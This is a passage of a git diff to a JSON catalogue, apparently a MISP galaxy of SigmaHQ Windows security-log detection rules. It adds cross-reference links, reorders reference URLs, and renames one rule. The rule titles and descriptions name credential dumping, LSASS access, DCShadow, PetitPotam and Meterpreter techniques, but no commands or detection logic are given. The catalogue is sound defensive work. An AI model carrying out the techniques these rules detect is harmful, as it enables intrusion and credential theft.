"estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "24549159-ac1b-479c-8175-d42aea947cae", "value": "Hacktool Ruler" }, @@ -4162,6 +5283,15 @@ "attack.t1070.001" ] }, + "related": [ + { + "dest-uuid": "6495ae23-3ab4-43c5-a94f-5638a2c31fd2", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "a122ac13-daf8-4175-83a2-72c387be339d", "value": "Security Event Log Cleared" }, @@ -4179,8 +5309,8 @@ "logsource.product": "windows", "refs": [ "https://awakesecurity.com/blog/threat-hunting-for-paexec/", - "https://blog.f-secure.com/wp-content/uploads/2019/10/CosmicDuke.pdf", "https://www.fireeye.com/blog/threat-research/2017/05/wannacry-malware-profile.html", + "https://blog.f-secure.com/wp-content/uploads/2019/10/CosmicDuke.pdf", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_mal_service_installs.yml" ], "tags": [ @@ -4192,6 +5322,22 @@ "attack.t1569.002" ] }, + "related": [ + { + "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "f1951e8a-500e-4a26-8803-76d95c4554b4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "cb062102-587e-4414-8efa-dbe3c7bf19c6", "value": "Malicious Service Installations" }, @@ -4292,6 +5438,15 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "cd0f7229-d16f-42de-8fe3-fba365fbcb3a", "value": "Invoke-Obfuscation Via Use Rundll32 - Security" }, @@ -4308,9 +5463,9 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://github.com/Yamato-Security/EnableWindowsLogSettings/blob/7f6d755d45ac7cc9fc35b0cbf498e6aa4ef19def/ConfiguringSecurityLogAuditPolicies.md", - "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4634", "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4647", + "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4634", + "https://github.com/Yamato-Security/EnableWindowsLogSettings/blob/7f6d755d45ac7cc9fc35b0cbf498e6aa4ef19def/ConfiguringSecurityLogAuditPolicies.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_user_logoff.yml" ], "tags": "No established tags" @@ -4378,9 +5533,9 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://github.com/iadgov/Event-Forwarding-Guidance/tree/master/Events", "https://blog.stealthbits.com/how-to-detect-pass-the-hash-attacks/", "https://blog.binarydefense.com/reliably-detecting-pass-the-hash-through-event-log-analysis", + "https://github.com/iadgov/Event-Forwarding-Guidance/tree/master/Events", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_pass_the_hash_2.yml" ], "tags": [ @@ -4404,9 +5559,9 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ + "https://docs.microsoft.com/en-gb/sysinternals/downloads/sdelete", "https://jpcertcc.github.io/ToolAnalysisResultSheet/details/sdelete.htm", "https://www.jpcert.or.jp/english/pub/sr/ir_research.html", - "https://docs.microsoft.com/en-gb/sysinternals/downloads/sdelete", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_sdelete.yml" ], "tags": [ @@ -4419,6 +5574,36 @@ "attack.s0195" ] }, + "related": [ + { + "dest-uuid": "d63a3fb8-9452-4e9d-a60a-54be68d5998c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "b0533c6e-8fea-4788-874f-b799cacc4b92", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "d45a3d09-b3cf-48f4-9f0f-f521ee5cb05c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "32901740-b42c-4fdd-bc02-345b5dc57082", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "39a80702-d7ca-4a83-b776-525b1f86a36d", "value": "Secure Deletion with SDelete" }, @@ -4507,8 +5692,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://twitter.com/SBousseaden/status/1207671369963646976", "https://www.fox-it.com/en/news/whitepapers/operation-wocao-shining-a-light-on-one-of-chinas-hidden-hacking-groups/", + "https://twitter.com/SBousseaden/status/1207671369963646976", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_apt_wocao.yml" ], "tags": [ @@ -4522,6 +5707,29 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "7bdca9d5-d500-4d7d-8c52-5fd47baf4c0c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "005a06c6-14bf-4118-afa0-ebcd8aebb0c9", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "74ad4314-482e-4c3e-b237-3f7ed3b9ca8d", "value": "Operation Wocao Activity - Security" }, @@ -4574,6 +5782,15 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "80b708f3-d034-40e4-a6c8-d23b7a7db3d1", "value": "Invoke-Obfuscation Via Stdin - Security" }, @@ -4601,6 +5818,22 @@ "attack.t1569.002" ] }, + "related": [ + { + "dest-uuid": "bf90d72c-c00b-45e3-b3aa-68560560d4c5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "f1951e8a-500e-4a26-8803-76d95c4554b4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "6fb63b40-e02a-403e-9ffd-3bcc1d749442", "value": "Metasploit Or Impacket Service Installation Via SMB PsExec" }, @@ -4625,6 +5858,15 @@ "attack.t1222.001" ] }, + "related": [ + { + "dest-uuid": "34e793de-0274-4982-9c1a-246ed1c19dee", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "028c7842-4243-41cd-be6f-12f3cf1a26c7", "value": "AD Object WriteDAC Access" }, @@ -4648,6 +5890,15 @@ "attack.t1212" ] }, + "related": [ + { + "dest-uuid": "9c306d8d-cde7-4b4c-b6e8-d0bb16caca36", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "f7644214-0eb0-4ace-9455-331ec4c09253", "value": "Kerberos Manipulation" }, @@ -4713,14 +5964,14 @@ "logsource.product": "windows", "refs": [ "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=632", - "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=634", - "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4728", - "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4730", + "https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf", "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4729", "https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf", "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=633", + "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=634", + "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4728", "https://www.cisecurity.org/controls/cis-controls-list/", - "https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf", + "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4730", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_group_modification_logging.yml" ], "tags": "No established tags" @@ -4751,6 +6002,29 @@ "attack.t1003.003" ] }, + "related": [ + { + "dest-uuid": "1644e709-12d2-41e5-a60f-3470991f5011", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "edf91964-b26e-4b4a-9600-ccacd7d7df24", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "910ab938-668b-401b-b08c-b596e80fdca5", "value": "Transferring Files with Credential Data via Network Shares" }, @@ -4767,8 +6041,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://github.com/elastic/detection-rules/blob/fb6ee2c69864ffdfe347bf3b050cb931f53067a6/rules/windows/privilege_escalation_krbrelayup_suspicious_logon.toml", "https://twitter.com/sbousseaden/status/1518976397364056071?s=12&t=qKO5eKHvWhAP19a50FTZ7g", + "https://github.com/elastic/detection-rules/blob/fb6ee2c69864ffdfe347bf3b050cb931f53067a6/rules/windows/privilege_escalation_krbrelayup_suspicious_logon.toml", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_krbrelayup.yml" ], "tags": [ @@ -4800,6 +6074,15 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "13acf386-b8c6-4fe0-9a6e-c4756b974698", "value": "Remote PowerShell Sessions Network Connections (WinRM)" }, @@ -4816,9 +6099,9 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://medium.com/@ivecodoe/detecting-ldapfragger-a-newly-released-cobalt-strike-beacon-using-ldap-for-c2-communication-c274a7f00961", - "https://github.com/fox-it/LDAPFragger", "https://blog.fox-it.com/2020/03/19/ldapfragger-command-and-control-over-ldap-attributes/", + "https://github.com/fox-it/LDAPFragger", + "https://medium.com/@ivecodoe/detecting-ldapfragger-a-newly-released-cobalt-strike-beacon-using-ldap-for-c2-communication-c274a7f00961", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_ldap_dataexchange.yml" ], "tags": [ @@ -4826,6 +6109,15 @@ "attack.command_and_control" ] }, + "related": [ + { + "dest-uuid": "c325b232-d5bc-4dde-a3ec-71f3db9e8adc", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "d00a9a72-2c09-4459-ad03-5e0a23351e36", "value": "Suspicious LDAP-Attributes Used" }, @@ -4878,6 +6170,15 @@ "attack.t1003.001" ] }, + "related": [ + { + "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "962fe167-e48d-4fd6-9974-11e5b9a5d6d1", "value": "LSASS Access from Non System Account" }, @@ -4904,6 +6205,29 @@ "attack.t1003.003" ] }, + "related": [ + { + "dest-uuid": "1644e709-12d2-41e5-a60f-3470991f5011", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "1ecfdab8-7d59-4c98-95d4-dc41970f57fc", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "edf91964-b26e-4b4a-9600-ccacd7d7df24", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "252902e3-5830-4cf6-bf21-c22083dfd5cf", "value": "Possible Impacket SecretDump Remote Activity" }, @@ -4946,9 +6270,9 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://blog.alsid.eu/dcshadow-explained-4510f52fc19d", - "https://gist.github.com/gentilkiwi/dcc132457408cf11ad2061340dcb53c2", "https://twitter.com/gentilkiwi/status/1003236624925413376", + "https://gist.github.com/gentilkiwi/dcc132457408cf11ad2061340dcb53c2", + "https://blog.alsid.eu/dcshadow-explained-4510f52fc19d", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_possible_dc_shadow.yml" ], "tags": [ @@ -4956,6 +6280,15 @@ "attack.t1207" ] }, + "related": [ + { + "dest-uuid": "564998d8-ab3e-4123-93fb-eccaa6b9714a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "32e19d25-4aed-4860-a55a-be99cb0bf7ed", "value": "Possible DC Shadow Attack" }, @@ -4980,6 +6313,15 @@ "attack.t1003.004" ] }, + "related": [ + { + "dest-uuid": "1ecfdab8-7d59-4c98-95d4-dc41970f57fc", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "4ac1f50b-3bd0-4968-902d-868b4647937e", "value": "DPAPI Domain Backup Key Extraction" }, @@ -5007,6 +6349,15 @@ "attack.t1053.005" ] }, + "related": [ + { + "dest-uuid": "005a06c6-14bf-4118-afa0-ebcd8aebb0c9", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "4f86b304-3e02-40e3-aa5d-e88a167c9617", "value": "Scheduled Task Deletion" }, @@ -5033,6 +6384,15 @@ "attack.t1021.002" ] }, + "related": [ + { + "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "f6c68d5f-e101-4b86-8c84-7d96851fd65c", "value": "T1047 Wmiprvse Wbemcomn DLL Hijack" }, @@ -5050,8 +6410,8 @@ "logsource.product": "windows", "refs": [ "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4616", - "Live environment caused by malware", "Private Cuckoo Sandbox (from many years ago, no longer have hash, NDA as well)", + "Live environment caused by malware", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_time_modification.yml" ], "tags": [ @@ -5059,6 +6419,15 @@ "attack.t1070.006" ] }, + "related": [ + { + "dest-uuid": "47f2d673-ca62-47e9-929b-1b0be9657611", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "faa031b5-21ed-4e02-8881-2591f98d82ed", "value": "Unauthorized System Time Modification" }, @@ -5111,6 +6480,15 @@ "attack.t1133" ] }, + "related": [ + { + "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "f88e112a-21aa-44bd-9b01-6ee2a2bbbed1", "value": "Failed Logon From Public IP" }, @@ -5135,6 +6513,15 @@ "attack.t1003.002" ] }, + "related": [ + { + "dest-uuid": "1644e709-12d2-41e5-a60f-3470991f5011", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "e9faba72-4974-4ab2-a4c5-46e25ad59e9b", "value": "VSSAudit Security Event Source Registration" }, @@ -5184,6 +6571,15 @@ "attack.t1098" ] }, + "related": [ + { + "dest-uuid": "a10641f4-87b4-45a3-a906-92a149cb2c27", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "53ad8e36-f573-46bf-97e4-15ba5bf4bb51", "value": "Password Change on Directory Service Restore Mode (DSRM) Account" }, @@ -5205,6 +6601,15 @@ "attack.t1212" ] }, + "related": [ + { + "dest-uuid": "9c306d8d-cde7-4b4c-b6e8-d0bb16caca36", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "7818b381-5eb1-4641-bea5-ef9e4cfb5951", "value": "Possible Remote Password Change Through SAMR" }, @@ -5229,6 +6634,15 @@ "attack.t1047" ] }, + "related": [ + { + "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "5af54681-df95-4c26-854f-2565e13cfab0", "value": "Login with WMI" }, @@ -5260,6 +6674,22 @@ "attack.t1071.004" ] }, + "related": [ + { + "dest-uuid": "005a06c6-14bf-4118-afa0-ebcd8aebb0c9", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "1996eef1-ced3-4d7f-bf94-33298cabbf72", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "c0580559-a6bd-4ef6-b9b7-83703d98b561", "value": "Chafer Activity - Security" }, @@ -5286,6 +6716,15 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "0c718a5e-4284-4fb9-b4d9-b9a50b3a1974", "value": "Invoke-Obfuscation STDIN+ Launcher - Security" }, @@ -5311,6 +6750,15 @@ "attack.t1486" ] }, + "related": [ + { + "dest-uuid": "b80d107d-fa0d-4b60-9684-b0433e8bdba0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "97919310-06a7-482c-9639-92b67ed63cf8", "value": "Suspicious Multiple File Rename Or Delete Occurred" }, @@ -5327,9 +6775,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://www.elastic.co/fr/blog/how-attackers-abuse-access-token-manipulation", "https://www.manageengine.com/log-management/cyber-security/access-token-manipulation.html", - "https://attack.mitre.org/techniques/T1134/001/", + "https://www.elastic.co/fr/blog/how-attackers-abuse-access-token-manipulation", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_access_token_abuse.yml" ], "tags": [ @@ -5338,6 +6785,15 @@ "attack.t1134.001" ] }, + "related": [ + { + "dest-uuid": "86850eff-2729-40c3-b85e-c4af26da4a2d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "02f7c9c1-1ae8-4c6a-8add-04693807f92f", "value": "Access Token Abuse" }, @@ -5386,6 +6842,15 @@ "attack.t1098" ] }, + "related": [ + { + "dest-uuid": "a10641f4-87b4-45a3-a906-92a149cb2c27", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "2c99737c-585d-4431-b61a-c911d86ff32f", "value": "Powerview Add-DomainObjectAcl DCSync AD Extend Right" }, @@ -5460,6 +6925,15 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "4edf51e1-cb83-4e1a-bc39-800e396068e3", "value": "Invoke-Obfuscation CLIP+ Launcher - Security" }, @@ -5514,6 +6988,15 @@ "attack.s0039" ] }, + "related": [ + { + "dest-uuid": "2aed01ad-3df3-4410-a8cb-11ea4ded587c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "968eef52-9cff-4454-8992-1e74b9cbad6c", "value": "Reconnaissance Activity" }, @@ -5540,6 +7023,15 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "1a0a2ff1-611b-4dac-8216-8a7b47c618a6", "value": "Invoke-Obfuscation Via Use Clip - Security" }, @@ -5567,6 +7059,15 @@ "attack.t1053.002" ] }, + "related": [ + { + "dest-uuid": "f3d95a1f-bba2-44ce-9af7-37866cd63fd0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "f6de6525-4509-495a-8a82-1f8b0ed73a00", "value": "Remote Task Creation via ATSVC Named Pipe" }, @@ -5605,10 +7106,10 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://twitter.com/SecurityJosh/status/1283027365770276866", "https://securityjosh.github.io/2020/04/23/Mute-Sysmon.html", - "https://twitter.com/Flangvik/status/1283054508084473861", "https://gist.github.com/Cyb3rWard0g/cf08c38c61f7e46e8404b38201ca01c8", + "https://twitter.com/Flangvik/status/1283054508084473861", + "https://twitter.com/SecurityJosh/status/1283027365770276866", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_sysmon_channel_reference_deletion.yml" ], "tags": [ @@ -5647,6 +7148,50 @@ "attack.s0005" ] }, + "related": [ + { + "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "1644e709-12d2-41e5-a60f-3470991f5011", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "1ecfdab8-7d59-4c98-95d4-dc41970f57fc", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "6add2ab5-2711-4e9d-87c8-7a0be8531530", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "f303a39a-6255-4b89-aecc-18c4d8ca7163", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "f1951e8a-500e-4a26-8803-76d95c4554b4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "f0d1feba-4344-4ca9-8121-a6c97bd6df52", "value": "Credential Dumping Tools Service Execution - Security" }, @@ -5671,6 +7216,15 @@ "attack.t1003.004" ] }, + "related": [ + { + "dest-uuid": "1ecfdab8-7d59-4c98-95d4-dc41970f57fc", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "39a94fd1-8c9a-4ff6-bf22-c058762f8014", "value": "DPAPI Domain Master Key Backup Attempt" }, @@ -5695,6 +7249,15 @@ "attack.t1010" ] }, + "related": [ + { + "dest-uuid": "4ae4f953-fe58-4cc8-a327-33257e30a830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "13addce7-47b2-4ca0-a98f-1de964d1d669", "value": "SCM Database Handle Failure" }, @@ -5721,6 +7284,15 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "4c54ba8f-73d2-4d40-8890-d9cf1dca3d30", "value": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - Security" }, @@ -5791,6 +7363,15 @@ "attack.t1048" ] }, + "related": [ + { + "dest-uuid": "a19e86f8-1c0a-4fea-8407-23b73d615776", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "9c8afa4d-0022-48f0-9456-3712466f9701", "value": "Tap Driver Installation - Security" }, @@ -5807,9 +7388,9 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ + "https://github.com/topotam/PetitPotam", "https://isc.sans.edu/forums/diary/Active+Directory+Certificate+Services+ADCS+PKI+domain+admin+vulnerability/27668/", "https://github.com/splunk/security_content/blob/develop/detections/endpoint/petitpotam_suspicious_kerberos_tgt_request.yml", - "https://github.com/topotam/PetitPotam", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_petitpotam_susp_tgt_request.yml" ], "tags": [ @@ -5817,16 +7398,25 @@ "attack.t1187" ] }, + "related": [ + { + "dest-uuid": "b77cf5f3-6060-475d-bd60-40ccbf28fdc2", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "6a53d871-682d-40b6-83e0-b7c1a6c4e3a5", "value": "PetitPotam Suspicious Kerberos TGT Request" }, { - "description": "Detects the loading of drivers via 'SeLoadDriverPrivilege' required to load or unload a device driver.\nWith this privilege, the user can dynamically load and unload device drivers or other code in to kernel mode.\nThis user right does not apply to Plug and Play device drivers.\nIf you exclude privileged users/admins and processes, which are allowed to do so, you are maybe left with bad programs trying to load malicious kernel drivers.\nThis will detect Ghost-In-The-Logs (https://github.com/bats3c/Ghost-In-The-Logs) and the usage of Sysinternals and various other tools.\nSo you have to work with a whitelist to find the bad stuff.\n", + "description": "Detects the usage of the 'SeLoadDriverPrivilege' privilege. This privilege is required to load or unload a device driver.\nWith this privilege, the user can dynamically load and unload device drivers or other code in to kernel mode.\nThis user right does not apply to Plug and Play device drivers.\nIf you exclude privileged users/admins and processes, which are allowed to do so, you are maybe left with bad programs trying to load malicious kernel drivers.\nThis will detect Ghost-In-The-Logs (https://github.com/bats3c/Ghost-In-The-Logs) and the usage of Sysinternals and various other tools. So you have to work with a whitelist to find the bad stuff.\n", "meta": { "author": "xknow (@xknow_infosec), xorxes (@xor_xes)", "creation_date": "2019/04/08", "falsepositive": [ - "Other legimate tools loading drivers. There are some: Sysinternals, CPU-Z, AVs etc. - but not much. You have to baseline this according to your used products and allowed tools. Also try to exclude users, which are allowed to load drivers." + "Other legimate tools loading drivers. Including but not limited to, Sysinternals, CPU-Z, AVs etc. A baseline needs to be created according to the used products and allowed tools. A good thing to do is to try and exclude users who are allowed to load drivers." ], "filename": "win_security_user_driver_loaded.yml", "level": "medium", @@ -5843,7 +7433,7 @@ ] }, "uuid": "f63508a0-c809-4435-b3be-ed819394d612", - "value": "Suspicious Driver Loaded By User" + "value": "Potential Privileged System Service Operation - SeLoadDriverPrivilege" }, { "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", @@ -5868,6 +7458,15 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "dcf2db1f-f091-425b-a821-c05875b8925a", "value": "Invoke-Obfuscation VAR+ Launcher - Security" }, @@ -5894,6 +7493,22 @@ "attack.t1134.002" ] }, + "related": [ + { + "dest-uuid": "86850eff-2729-40c3-b85e-c4af26da4a2d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "677569f9-a8b0-459e-ab24-7f18091fa7bf", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "ecbc5e16-58e0-4521-9c60-eb9a7ea4ad34", "value": "Meterpreter or Cobalt Strike Getsystem Service Installation - Security" }, @@ -5919,6 +7534,15 @@ "attack.t1557.001" ] }, + "related": [ + { + "dest-uuid": "650c784b-7504-4df7-ab2c-4ea882384d1e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "16f5d8ca-44bd-47c8-acbe-6fc95a16c12f", "value": "RottenPotato Like Attack Pattern" }, @@ -5936,8 +7560,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://adsecurity.org/?p=3458", "https://www.trimarcsecurity.com/single-post/TrimarcResearch/Detecting-Kerberoasting-Activity", + "https://adsecurity.org/?p=3458", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_rc4_kerberos.yml" ], "tags": [ @@ -5971,6 +7595,15 @@ "attack.t1546.003" ] }, + "related": [ + { + "dest-uuid": "910906dd-8c0a-475a-9cc1-5e029e2fad58", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "9599c180-e3a8-4743-8f92-7fb96d3be648", "value": "Remote WMI ActiveScriptEventConsumers" }, @@ -6044,6 +7677,15 @@ "attack.initial_access" ] }, + "related": [ + { + "dest-uuid": "3b744087-9945-4a6f-91e8-9dbceda417a4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "f69a87ea-955e-4fb4-adb2-bb9fd6685632", "value": "External Disk Drive Or USB Storage Device" }, @@ -6060,8 +7702,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4741", "https://github.com/Yamato-Security/EnableWindowsLogSettings/blob/7f6d755d45ac7cc9fc35b0cbf498e6aa4ef19def/ConfiguringSecurityLogAuditPolicies.md", + 